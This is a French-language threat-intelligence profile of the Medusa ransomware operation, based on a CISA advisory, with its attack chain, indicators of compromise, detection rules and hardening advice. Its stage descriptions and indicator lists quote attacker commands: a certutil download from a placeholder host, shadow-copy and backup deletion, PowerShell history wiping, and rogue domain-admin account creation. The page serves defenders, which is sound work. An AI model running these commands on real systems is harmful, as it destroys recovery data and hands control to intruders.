Medusa Ransomware

Ransomware en tant que service · Observé pour la première fois en juin 2021

Présentation

Medusa est une opération de ransomware en tant que service observée pour la première fois en juin 2021. Elle applique un modèle de double extorsion : les affiliés chiffrent les systèmes des victimes tandis que le groupe principal exfiltre simultanément les données sensibles. Les victimes qui refusent de payer s’exposent à la publication de leurs données sur Medusa Blog, un site de fuite hébergé sur Tor dont le compte à rebours est visible par tous. Selon CISA AA25-071A, les rançons demandées vont de 100 000 à 15 millions de dollars selon la taille de la victime.

Le groupe ne doit pas être confondu avec la famille de ransomware MedusaLocker, une variante distincte et plus ancienne, ni avec le cheval de Troie bancaire Android Medusa. Le RaaS visant Windows traité ici a suscité une attention importante après la publication d’un avis conjoint CISA/FBI/MS-ISAC (AA25-071A) publié le 12 mars 2025, qui recense plus de 300 victimes dans les secteurs de la santé, de l’enseignement, du droit, de l’assurance, de la technologie et de l’industrie.

Microsoft Threat Intelligence a signalé en avril 2026 que Storm-1175 avait déployé le ransomware Medusa dans le cadre d’opérations à rythme soutenu ciblant des systèmes Web vulnérables. Dans certains cas, moins de 24 heures se sont écoulées entre l’exploitation réussie, l’exfiltration des données et le déploiement du ransomware.

Les affiliés Medusa obtiennent principalement l’accès initial au moyen de campagnes d’hameçonnage et de l’exploitation de services exposés à Internet non corrigés. La CISA indique que le groupe exploite ConnectWise ScreenConnect CVE-2024-1709 (contournement de l’authentification) et CVE-2023-48788, une injection SQL dans Fortinet EMS, toutes deux fréquentes dans les intrusions observées. Une part importante des accès est achetée à des courtiers en accès initial, activement recrutés par les développeurs de Medusa sur des forums cybercriminels avec des offres allant de 100 à 1 million de dollars par accès. Après avoir établi une présence, les affiliés consacrent du temps à la reconnaissance interne et au mouvement latéral avant de déployer la charge utile du ransomware. Le contournement des défenses repose sur une attaque Bring Your Own Vulnerable Driver (BYOVD) utilisant un pilote personnalisé signé, ABYSSWORKER, afin de désactiver la détection sur les terminaux, ainsi que sur la suppression de l’historique des commandes PowerShell.

La charge utile — un binaire nommé gaze.exe d’après l’enquête de la CISA — utilise AES-256 pour chiffrer les fichiers. Avant le chiffrement, gaze.exe arrête les services liés aux sauvegardes, à la sécurité, aux bases de données, aux communications, au partage de fichiers et aux sites Web, puis supprime les clichés instantanés des volumes. Chaque fichier chiffré reçoit l’extension .medusa et une note de rançon (!!!READ_ME_MEDUSA!!!.txt) est déposée dans chaque répertoire affecté. Les victimes disposent de 48 heures pour prendre contact via un chat en direct sur Tor ou la messagerie chiffrée de bout en bout Tox ; celles qui ne répondent pas sont relancées directement par téléphone ou e-mail. Le site de fuite .onion de Medusa affiche un compte à rebours ; les victimes peuvent payer 10 000 $ en cryptomonnaie pour y ajouter une journée.

CHAÎNE D’ATTAQUE OPÉRATIONNELLE · CHAÎNE D’ATTAQUE MEDUSA RAAS
  1. Départ

    Accès initial

    Hameçonnage · RDP · achat auprès d’un courtier en accès initial

  2. 1
    ÉTAPE 1

    Reconnaissance et persistance

    Scanners réseau · création de comptes de domaine

  3. 2
    ÉTAPE 2

    Contournement des défenses

    ABYSSWORKER BYOVD · suppression VSS · effacement de l’historique

  4. 3
    ÉTAPE 3

    Mouvement latéral

    RDP · PsExec · outils RMM

    T1021.001T1569.002
  5. 4
    ÉTAPE 4

    Exfiltration des données

    Rclone → serveurs C2 de Medusa

  6. 5
    ÉTAPE 5

    Chiffrement

    gaze.exe · AES-256 · extension .medusa

  7. IMPACT

    Double extorsion

    Site de fuite Tor + compte à rebours

Tactiques, techniques et procédures

Couverture du cadre MITRE ATT&CK Enterprise sur l’ensemble de la chaîne d’attaque Medusa. Les lignes mises en évidence correspondent aux tactiques dans lesquelles Medusa présente un comportement distinctif ou à fort impact.

DÉTAIL DES TECHNIQUESTechniques principales · Ransomware Medusa
TACTIQUETECHNIQUESREMARQUES
Accès initialSelon la CISA : campagnes d’hameçonnage visant le vol d’identifiants, ainsi que l’exploitation de ConnectWise ScreenConnect CVE-2024-1709 (contournement de l’authentification, CWE-288) et de l’injection SQL Fortinet EMS CVE-2023-48788. Les développeurs de Medusa recrutent activement des courtiers en accès initial (IAB) sur des forums cybercriminels, avec des offres allant de 100 dollars à 1 million de dollars par accès.
ExécutionPowerShell est utilisé tout au long de l’attaque pour la préparation, l’énumération et la distribution des charges utiles. PsExec et WMIC servent à exécuter des commandes sur des hôtes distants. Des outils RMM légitimes (PDQ Deploy, ConnectWise) sont détournés pour la distribution latérale.
PersistanceLa CISA indique que Medusa crée des comptes de domaine afin de conserver l’accès. Les commandes observées comprennent net user /add default <password> /domain, puis l’ajout aux groupes Domain Admins, Enterprise Admins et Remote Desktop Users.
Contournement des défensesUn pilote noyau signé (ABYSSWORKER / smuol.sys) est chargé pour arrêter les processus EDR au niveau ring 0. L’historique des commandes PowerShell est effacé au moyen de Remove-Item (Get-PSReadlineOption).HistorySavePath. Les charges utiles PowerShell sont obscurcies par encodage base64, concaténation de chaînes et blocs de script en mémoire compressés avec gzip. Les clichés instantanés des volumes sont supprimés avec vssadmin.exe Delete Shadows /all /quiet, technique classée dans Impact sous T1490. certutil -f urlcache sert à faire entrer les fichiers.
Accès aux identifiantsMimikatz ou des outils similaires servent à récupérer les hachages NTLM et tickets Kerberos dans la mémoire de LSASS, ce qui permet le mouvement latéral par pass-the-hash et pass-the-ticket sans casser les mots de passe.
DécouverteAdvanced IP Scanner et SoftPerfect Network Scanner servent à l’énumération du réseau. Des commandes Windows natives (net share, net group "domain admins" /domain, nltest /dclist:, systeminfo) complètent l’analyse. Les ports fréquemment analysés comprennent 21, 22, 23, 80, 115, 443, 1433, 3050, 3128, 3306 et 3389.
Mouvement latéralRDP est activé à l’échelle du cluster au moyen de openrdp.bat, qui crée une règle de pare-feu pour le port 3389, active WMI et définit fDenyTSConnections=0. PsExec copie et exécute des scripts batch en tant que SYSTEM. Les affiliés exploitent également les outils RMM déjà présents dans l’environnement de la victime — AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Inventory, SimpleHelp et Splashtop — afin de se fondre dans l’activité normale. PDQ Deploy et BigFix servent à distribuer le binaire de chiffrement dans le domaine. (T1072 figure aussi sous Exécution ; Medusa utilise les outils de déploiement à la fois pour l’exécution de commandes à distance et la distribution latérale du binaire de chiffrement.)
CollecteLes partages réseau, serveurs de fichiers et référentiels de sauvegarde sont énumérés et ciblés. Les documents sensibles, données financières, informations personnelles, identifiants et autres contenus à fort pouvoir d’extorsion sont prioritaires.
Commande et contrôleShells inverses ou en écoute sur le port 443 (HTTPS) au moyen du stager open source powerfun.ps1. Ligolo sert au tunneling inverse ; Cloudflared, anciennement ArgoTunnel, expose les services internes via Cloudflare Tunnel sans exposition directe.
ExfiltrationLa CISA indique que Rclone exfiltre les données vers les serveurs C2 de Medusa (T1567.002). L’exfiltration précède le chiffrement : le levier de double extorsion est établi avant que la victime ne prenne conscience de la compromission.
ImpactAES-256 chiffre le contenu des fichiers. Les fichiers chiffrés reçoivent l’extension .medusa. Une note de rançon est déposée dans chaque répertoire. Les clichés instantanés et sauvegardes sont supprimés au préalable. Avant le chiffrement, gaze.exe arrête les services liés aux sauvegardes, à la sécurité, aux bases de données, aux communications, au partage de fichiers et aux sites Web (T1489). Après le chiffrement, les acteurs arrêtent et chiffrent manuellement les machines virtuelles (T1529). Les victimes subissent simultanément le chiffrement et la menace de publication des données sur un site de fuite Tor.
ÉTAPE 1T1566 · T1190

Accès initial et prise de pied

La CISA documente deux principaux modèles d’accès initial pour Medusa. Le premier consiste en des campagnes d’hameçonnage menées par des courtiers en accès initial afin de voler les identifiants des victimes. Le second repose sur l’exploitation d’applications exposées à Internet et non corrigées ; l’avis cite précisément ConnectWise ScreenConnect CVE-2024-1709 (un contournement de l’authentification, CWE-288) et l’injection SQL CVE-2023-48788 dans Fortinet EMS (CWE-89).

Une part importante des intrusions Medusa commence par l’achat d’un accès plutôt que par une compromission directe. Les développeurs de Medusa recrutent activement des courtiers en accès initial sur des forums et places de marché cybercriminels, en proposant de 100 à 1 million de dollars par accès, avec la possibilité de travailler exclusivement pour Medusa. Ainsi, lorsque l’activité Medusa devient détectable, l’intrusion initiale peut avoir été réalisée plusieurs semaines ou mois auparavant par un autre acteur.

ÉTAPE 2T1046 · T1135 · T1069.002 · T1082 · T1136.002

Reconnaissance et persistance

Après avoir établi une présence, les acteurs Medusa utilisent à la fois des outils d’analyse légitimes et des commandes Windows natives pour l’énumération. La CISA cite Advanced IP Scanner et SoftPerfect Network Scanner comme principaux outils de découverte. Des commandes natives complètent ces outils : net share pour les lecteurs partagés, net group "domain admins" /domain pour les comptes à forte valeur, nltest /dclist: pour énumérer les contrôleurs de domaine et systeminfo pour relever l’empreinte de l’hôte.

Les ports fréquemment analysés comprennent 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP), 115 (SFTP), 443 (HTTPS), 1433 (SQL), 3050 (Firebird), 3128 (proxy HTTP), 3306 (MySQL) et 3389 (RDP).

La persistance est établie par la création de comptes de domaine. La CISA documente les commandes exactes : net user /add default <password> /domain, puis l’ajout du compte aux groupes Domain Admins, Enterprise Admins, Remote Desktop Users, Group Policy Creator Owners et Schema Admins. Ces comptes non autorisés permettent aux affiliés de conserver l’accès même si le point d’entrée initial est fermé.

ÉTAPE 3T1562.001 · T1014 · T1070.003 · T1027.013

Contournement des défenses : BYOVD et suppression des indicateurs

La technique de contournement la plus importante de Medusa sur le plan technique est Bring Your Own Vulnerable Driver (BYOVD). Des rapports de renseignement sur les menaces publiés en mars 2025 ont attribué aux intrusions Medusa un pilote noyau personnalisé signé nommé ABYSSWORKER (nom de fichier smuol.sys), déployé via un chargeur empaqueté avec le service HeartCrypt. Le pilote est signé à l’aide de certificats volés ou révoqués de fournisseurs chinois et conçu pour imiter un pilote EDR légitime signé, ce qui lui permet de se charger sur des systèmes qui rejetteraient normalement des composants noyau non signés ou inconnus. Une fois chargé au niveau ring 0, ABYSSWORKER sert à arrêter ou aveugler les agents EDR depuis le contexte du noyau, où la plupart des outils de sécurité de l’espace utilisateur ne peuvent ni observer ni intervenir. Des artefacts ABYSSWORKER ont été observés sur VirusTotal entre août 2024 et février 2025.

La suppression des indicateurs vient ensuite. La CISA documente l’effacement par Medusa de l’historique des lignes de commande PowerShell au moyen de Remove-Item (Get-PSReadlineOption).HistorySavePath, ainsi que plusieurs modèles de contournement PowerShell : commandes encodées en base64 via -enc, chaînes découpées puis concaténées et blocs de script en mémoire compressés avec gzip. Les clichés instantanés des volumes sont supprimés au moyen de vssadmin. Le binaire de chiffrement gaze.exe arrête ensuite automatiquement les services liés aux sauvegardes, à la sécurité, aux bases de données, aux communications, au partage de fichiers et aux sites Web (T1489).

Commandes de contournement des défenses documentées dans CISA AA25-071A (Annexe A)
powershell -exec bypass -enc <base64 encrypted command string>

powershell Remove-Item (Get-PSReadlineOption).HistorySavePath

vssadmin.exe Delete Shadows /all /quiet

cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.msi <localfile>.msi

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0

del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf

Source : CISA AA25-071A, annexe A — Commandes Medusa

Étape 4T1021.001 · T1569.002 · T1219 · T1072 · T1567.002

Mouvement latéral et exfiltration des données

Le mouvement latéral repose sur RDP, PsExec et les logiciels d’accès à distance déjà présents dans l’environnement de la victime. La CISA indique que les acteurs Medusa exploitent les outils RMM existants — notamment AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Inventory, SimpleHelp et Splashtop — afin de se fondre dans le trafic légitime des administrateurs. Le script batch openrdp.bat sert à ouvrir RDP à l’échelle du cluster : il ajoute une règle de pare-feu pour le port 3389, autorise les connexions WMI distantes et définit la valeur de registre fDenyTSConnections sur 0. PsExec copie et exécute ensuite les charges utiles avec des privilèges de niveau SYSTEM.

Mimikatz est utilisé pour extraire la mémoire de LSASS (T1003.001), récupérer des identifiants et faciliter le mouvement latéral. Le binaire de chiffrement gaze.exe est distribué dans le domaine au moyen de PsExec, PDQ Deploy ou BigFix immédiatement avant son déclenchement.

L’exfiltration des données intervient avant le chiffrement, établissant le levier d’extorsion indépendamment de l’impact du chiffrement. La CISA confirme que les acteurs Medusa utilisent Rclone pour exfiltrer les données vers leurs propres serveurs C2, et non vers un stockage cloud tiers. Pour l’infrastructure de commande et contrôle, la CISA documente aussi l’utilisation de Ligolo, un outil de tunneling inverse, et de Cloudflared, anciennement ArgoTunnel, afin d’exposer de manière sécurisée les ressources de la victime à l’infrastructure de l’attaquant.

  • openrdp.bat (MD5 : 44370f5c977e415981febf7dbb87a85c selon la CISA) — IOC durable pour l’activation de RDP
  • pu.exe (MD5 : 80d852cd199ac923205b61658a9ec5bc) — shell inverse, identifié dans le tableau 1 de la CISA
  • Le script de stager open source powerfun.ps1 sert à créer des shells TLS inverses ou en écoute sur le port 443
Stage 5T1486 · T1657 · T1489 · T1490 · T1529

Encryption and double extortion

Le binaire de chiffrement du ransomware Medusa est nommé gaze.exe d’après l’enquête de la CISA. Il est déployé sur le réseau au moyen de Sysinternals PsExec, PDQ Deploy ou BigFix, les services antivirus et de protection des terminaux étant désactivés sur certaines cibles avant son déclenchement. Les fichiers chiffrés reçoivent l’extension .medusa ; la note de rançon !!!READ_ME_MEDUSA!!!.txt est écrite dans chaque répertoire parcouru.

La séquence de chiffrement est documentée par la CISA : gaze.exe arrête tous les services liés aux sauvegardes, à la sécurité, aux bases de données, aux communications, au partage de fichiers et aux sites Web (T1489), supprime ensuite les clichés instantanés (T1490), puis chiffre les fichiers avec AES-256 avant de déposer la note de rançon. Après le chiffrement, les acteurs arrêtent et chiffrent manuellement les machines virtuelles (T1529), puis suppriment les outils installés afin d’entraver la reconstitution forensique.

Les victimes disposent de 48 heures pour prendre contact via un chat en direct sur Tor ou Tox, une plateforme de messagerie instantanée chiffrée de bout en bout. En l’absence de réponse, les acteurs Medusa les contactent directement par téléphone ou e-mail ; le tableau 2 de la CISA répertorie cinq adresses d’extorsion utilisées pour la négociation, notamment key.medusa.serviceteam@protonmail.com et MedusaSupport@cock.li. Le site de fuite .onion de Medusa affiche les victimes avec des comptes à rebours ; les données sont simultanément proposées à la vente à des tiers intéressés avant l’expiration du délai. Les victimes peuvent payer 10 000 USD en cryptomonnaie pour ajouter une journée au compte à rebours.

La CISA documente également un modèle de triple extorsion observé dans au moins un cas : après le paiement de la rançon, une victime a été contactée par un autre acteur Medusa affirmant que le négociateur initial avait volé les fonds et exigeant la moitié de la somme une seconde fois pour fournir le « véritable outil de déchiffrement ».

Arborescence des processus

Aspect de la chaîne d’attaque Medusa dans la télémétrie EDR

Indicateurs de compromission

IOC comportementaux durables : chemins de fichiers, clés de registre, modèles de processus et comportements réseau cohérents d’une campagne Medusa à l’autre. Ils résistent mieux aux changements de variante que les indicateurs fondés sur les hachages.

Chemins de fichiers et binaires

7 indicateurs

Noms de fichiers et emplacements documentés dans CISA AA25-071A et dans les rapports de renseignement sur les menaces ultérieurs.

  • gaze.exeMedusa encryptor binary (CISA-confirmed)
  • smuol.sysABYSSWORKER kernel driver - mimics a signed EDR driver; signed with stolen Chinese vendor certs
  • openrdp.batRDP enablement script - MD5 44370f5c977e415981febf7dbb87a85c
  • pu.exeReverse shell - MD5 80d852cd199ac923205b61658a9ec5bc
  • !!!READ_ME_MEDUSA!!!.txtRansom note dropped in all encrypted directories
  • [filename].medusaEncrypted file extension
  • \\<host>\sysvol\gaze.exeStaging location observed on domain controllers

Artefacts de registre et de comptes

4 indicateurs

Modifications de registre et de comptes documentées dans l’annexe A de CISA AA25-071A.

  • HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0Restricted Admin mode disabled to allow credential-relay over RDP
  • HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections = 0RDP enabled via openrdp.bat
  • HKLM\SYSTEM\CurrentControlSet\Services\[svc]Service registration for the ABYSSWORKER kernel driver (smuol.sys)
  • net user /add default <pwd> /domainRogue domain account creation; followed by Domain Admins group addition

Comportements des processus

Haute fidélité

Modèles comportementaux issus de l’annexe A de la CISA — ces combinaisons sont rarement légitimes.

  • vssadmin.exe Delete Shadows /all /quietVSS deletion - direct CISA-confirmed Medusa command
  • powershell Remove-Item (Get-PSReadlineOption).HistorySavePathPowerShell command history deletion
  • certutil -f urlcache https://<d>/<f>.msiLiving-off-the-land file ingress via certutil
  • psexec.exe -accepteula -s \\<host> -c <script>.batBatch scripts deployed: openrdp.bat, StopAllProcess.bat, newuser.bat, zam.bat

Artefacts réseau et de contact

5 indicateurs

Modèles réseau et canaux de contact issus des tableaux 1 et 2 de CISA AA25-071A.

  • Cloudflared (ArgoTunnel) trafficCloudflare Tunnel used to expose victim resources without direct port exposure
  • Ligolo reverse tunnelReverse tunneling between victim and threat actor infrastructure
  • Reverse / bind shell on TCP/443PowerShell stager (powerfun.ps1) opens TLS shell on 443
  • key.medusa.serviceteam@protonmail.comRansom negotiation address - one of five in CISA Table 2
  • MedusaSupport@cock.liRansom negotiation address - CISA Table 2

Recommandations de détection

Six possibilités de détection dans la chaîne d’attaque Medusa, classées selon le point d’intervention le plus précoce. Les détections 1 à 3 se déclenchent plusieurs jours ou semaines avant le chiffrement ; les détections 4 à 6 interviennent au cours des dernières étapes de l’attaque.

  1. 01

    Chargement du pilote noyau ABYSSWORKER — BYOVD propre à Medusa

    Télémétrie EDR / noyau

    Générez une alerte lors du chargement de pilotes noyau correspondant à smuol.sys par hachage, nom de fichier ou modèle de signature : certificat révoqué d’un fournisseur chinois et métadonnées de fichier imitant un produit EDR légitime. Complétez par les sc.exe create événements qui enregistrent un service en mode noyau depuis un chemin non système, par exemple %TEMP%, %ProgramData%). Recoupez les pilotes chargés avec le jeu de données LOLDrivers.

    Pourquoi cela fonctionne : ABYSSWORKER est une charge utile BYOVD signalée dans des intrusions Medusa. La détection des chargements de pilotes suspects avant l’altération des outils de sécurité donne aux défenseurs un point d’intervention plus précoce. Les listes génériques de blocage des pilotes vulnérables peuvent ne pas couvrir immédiatement les nouveaux pilotes personnalisés signés ; il est donc recommandé de surveiller explicitement les enregistrements suspects de pilotes, l’utilisation de certificats révoqués et les chemins de pilotes non standard.

  2. 02

    Suppression de l’historique des commandes PowerShell et exécution encodée obscurcie

    EDR / journalisation des blocs de script

    Générez une alerte sur la commande Medusa exacte documentée par la CISA, Remove-Item (Get-PSReadlineOption).HistorySavePath : il s’agit d’un indicateur Medusa littéral. Associez-la à une détection de PowerShell lancé avec -exec bypass -enc (commandes encodées en base64), ainsi qu’au modèle de concaténation de chaînes documenté par la CISA : $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le', qui masque DownloadFile. Générez également une alerte sur le modèle de bloc de script de décompression gzip décrit dans l’avis.

    Pourquoi cela fonctionne : la commande de suppression de l’historique figure dans l’annexe A de la CISA et n’a que peu d’usages administratifs légitimes en dehors des opérations de maintenance approuvées. Considérez-la comme à haut risque lorsqu’elle est associée à une exécution encodée, à des processus parents suspects ou à d’autres comportements liés à Medusa. Cette détection repère Medusa plus tôt dans la chaîne d’attaque que la suppression VSS.

  3. 03

    Advanced IP Scanner / SoftPerfect Network Scanner sur des hôtes internes

    Télémétrie EDR / des processus

    Générez une alerte sur l’exécution de advanced_ip_scanner.exe ou de binaires SoftPerfect Network Scanner depuis des postes de travail ou serveurs non administratifs. Complétez-la par une détection des commandes d’énumération natives documentées par la CISA : net group "domain admins" /domain, nltest /dclist:, net share et systeminfo lorsqu’elles sont exécutées par un principal de sécurité non administrateur ou depuis un processus parent inhabituel, par exemple powershell.exe lancé par un compte de service.

    Pourquoi cela fonctionne : la CISA cite explicitement Advanced IP Scanner et SoftPerfect Network Scanner comme outils d’énumération de Medusa. Ils sont disponibles dans le commerce et ne sont pas strictement malveillants, mais leur présence hors d’opérations légitimes d’inventaire IT constitue un indicateur de reconnaissance à haute confiance. Cette détection se déclenche plusieurs jours avant le déploiement de la charge utile.

  4. 04

    Exécution de Rclone et trafic sortant soutenu

    Proxy / DLP / des processus

    Générez une alerte sur l’exécution de rclone.exe, y compris lorsque le binaire est renommé mais identifiable par ses imports PE et son comportement (ouverture de rclone.conf, requêtes POST HTTPS répétitives avec chargements segmentés). Au niveau du réseau, signalez la chaîne User-Agent rclone/ dans les journaux du proxy ainsi que tout trafic sortant soutenu et volumineux vers un terminal externe depuis un processus autre qu’un navigateur. La CISA indique que Medusa exfiltre vers ses propres serveurs C2 ; les adresses IP et domaines de destination changent fréquemment, la détection ne doit donc pas dépendre d’une liste statique de destinations.

    Pourquoi cela fonctionne : Rclone a peu d’utilisations légitimes dans les environnements d’entreprise étroitement gérés, et son exécution inattendue sur des serveurs ou des terminaux présente un risque élevé. Sa présence, même sous un autre nom, constitue un indicateur à haute confiance d’une exfiltration active. La détection à ce stade empêche l’établissement du levier de double extorsion.

  5. 05

    Suppression des clichés instantanés des volumes

    EDR / journaux d’événements Windows

    Générez une alerte sur la commande exacte documentée par la CISA, vssadmin.exe Delete Shadows /all /quiet. Signalez également la suppression en masse de types de fichiers de sauvegarde via del /s /f /q ciblant *.VHD, *.bak, *.bkf et *.wbcat : il s’agit d’une séquence de commandes Medusa reproduite littéralement dans l’annexe A de la CISA.

    Pourquoi cela fonctionne : la suppression des clichés instantanés constitue un indicateur de ransomware presque universel et est documentée mot pour mot pour Medusa. La suppression séquentielle de toutes les copies VSS et des archives de sauvegarde est rarement légitime hors d’un workflow de maintenance ou de récupération documenté. Ce groupe de signaux se déclenche de manière fiable quelle que soit la variante de la charge utile.

  6. 06

    Binaire de chiffrement gaze.exe et changement rapide vers l’extension .medusa

    Surveillance de l’intégrité des fichiers / EDR

    Générez une alerte lors de l’exécution de tout processus nommé gaze.exe, quel que soit son chemin. Associez-la à une détection de surveillance de l’intégrité des fichiers lorsque le même processus produit plus d’environ 100 événements de renommage ou d’écrasement de fichiers par seconde dans plusieurs répertoires, que l’extension obtenue est .medusa, ainsi qu’à la création de fichiers nommés !!!READ_ME_MEDUSA!!!.txt.

    Pourquoi cela fonctionne :gaze.exe est le nom du binaire de chiffrement confirmé par la CISA. Le renommage en masse est un indicateur tardif : il ne peut pas empêcher le chiffrement des fichiers déjà traités, mais permet d’isoler rapidement le réseau afin de limiter la propagation aux partages et systèmes distants qui ne sont pas encore chiffrés.

Recommandations de durcissement

Cinq contrôles qui répondent directement à la chaîne d’attaque Medusa. Les éléments marqués Action rapide peuvent être déployés en quelques jours au moyen d’une seule GPO ou modification de stratégie. Les éléments Standard nécessitent un déploiement progressif ou un processus de gestion des changements.

  1. Activer Microsoft HVCI et appliquer la liste de blocage des pilotes vulnérables

    Standard

    L’intégrité du code protégée par l’hyperviseur (HVCI) empêche le chargement de pilotes non signés ou inscrits sur une liste de blocage. Notez qu’ABYSSWORKER (smuol.sys) de Medusa est un pilote personnalisé signé au moyen de certificats volés à des fournisseurs chinois ; il peut ne pas figurer immédiatement sur les listes de blocage par défaut. Abonnez-vous aux flux de révocation de certificats et intégrez la télémétrie communautaire sur les pilotes (LOLDrivers) afin de maintenir à jour les stratégies WDAC.

    Chemin : Sécurité Windows → Sécurité des appareils → Isolation du noyau → Intégrité de la mémoire. Appliquez via la stratégie MDM : ./Vendor/MSFT/Policy/Config/VirtualizationBasedTechnology/HypervisorEnforcedCodeIntegrity. Matériel compatible requis.

  2. Désactiver RDP sur tous les terminaux qui n’en ont pas besoin ; appliquer NLA et MFA sur les serveurs

    Action rapide

    Les acteurs Medusa utilisent RDP comme principal mécanisme de mouvement latéral et l’activent à l’échelle du cluster au moyen de openrdp.bat après la compromission initiale. La désactivation de RDP sur les postes de travail via GPO élimine une voie majeure de propagation latérale. Pour les serveurs qui nécessitent RDP, appliquez l’authentification au niveau du réseau et exigez la MFA au moyen d’une architecture PAM ou de serveur de rebond. La restriction de RDP réduit aussi l’exposition aux accès vendus par les courtiers en accès initial, qui reposent souvent sur des identifiants RDP compromis.

    Chemin : Configuration ordinateur → Modèles d’administration → Composants Windows → Services Bureau à distance → Hôte de session Bureau à distance → Connexions → Autoriser les utilisateurs à se connecter à distance (définir sur Désactivé pour les systèmes autres que les serveurs).

  3. Mettre en œuvre un modèle Active Directory à niveaux ; restreindre les voies de mouvement latéral

    Standard

    Le mouvement latéral de Medusa dépend de l’accessibilité des identifiants d’administrateur de domaine depuis des postes de travail compromis au moyen de pass-the-hash. Le modèle Enterprise Access de Microsoft, anciennement modèle AD à niveaux, sépare le niveau 0 (contrôleurs de domaine), le niveau 1 (serveurs) et le niveau 2 (postes de travail), empêchant les identifiants récupérés sur les postes d’atteindre le contexte d’administrateur de domaine.

    Chemin : mettez en œuvre ce modèle au moyen du groupe de sécurité Protected Users pour les comptes administratifs, de Credential Guard pour protéger LSASS et de PAW (Privileged Access Workstations) pour les tâches d’administration. Consultez la documentation Microsoft Enterprise Access Model.

  4. Signaler ou bloquer la commande vssadmin delete shadows au moyen du contrôle des applications

    Action rapide

    La suppression ponctuelle de tous les clichés instantanés des volumes en dehors d’une fenêtre de maintenance documentée doit être considérée comme à haut risque. Créez une règle EDR personnalisée afin de signaler immédiatement vssadmin delete shadows /all ou, dans les environnements dotés d’une gestion des changements mature, bloquez entièrement cette commande au moyen d’AppLocker ou de WDAC dans les contextes non administratifs.

    Chemin : règle comportementale EDR ou stratégie WDAC restreignant vssadmin.exe avec les arguments delete shadows dans les contextes non élevés. Commencez en mode audit afin d’identifier les usages légitimes.

  5. Conserver des sauvegardes hors ligne, testées et immuables — et tester la restauration chaque trimestre

    Action rapide

    Medusa supprime les copies VSS et les catalogues de sauvegarde Windows, et cible les serveurs de sauvegarde pour les chiffrer. Les sauvegardes hors ligne ou immuables, selon la règle 3-2-1 — 3 copies, 2 types de supports, 1 copie hors site/hors ligne — constituent le principal contrôle de récupération lorsque tous les contrôles de détection et de prévention échouent. Des sauvegardes non testées qui ne peuvent pas être restaurées dans le délai de l’incident n’ont aucune valeur opérationnelle.

    Chemin : mettez en œuvre des niveaux de stockage cloud à écriture unique (AWS S3 Object Lock, blob immuable Azure) ou une rotation de bandes hors ligne. Effectuez des exercices de restauration trimestriels et mesurez le RTO par rapport aux objectifs métier de reprise. Les identifiants des agents de sauvegarde ne doivent pas être accessibles depuis les machines jointes au domaine.

Références principales

Sources sur lesquelles cette page est fondée. Dernière vérification par rapport aux rapports de la CISA, du FBI et de Microsoft sur les menaces publiés jusqu’en juin 2026.

Testez vos défenses contre la chaîne d’attaque BYOVD-vers-ransomware de Medusa.

Malware Protection Plus détecte les modèles comportementaux de la chaîne d’attaque — chargements de pilotes BYOVD, suppression VSS et chiffrement en masse — avant la perte des données.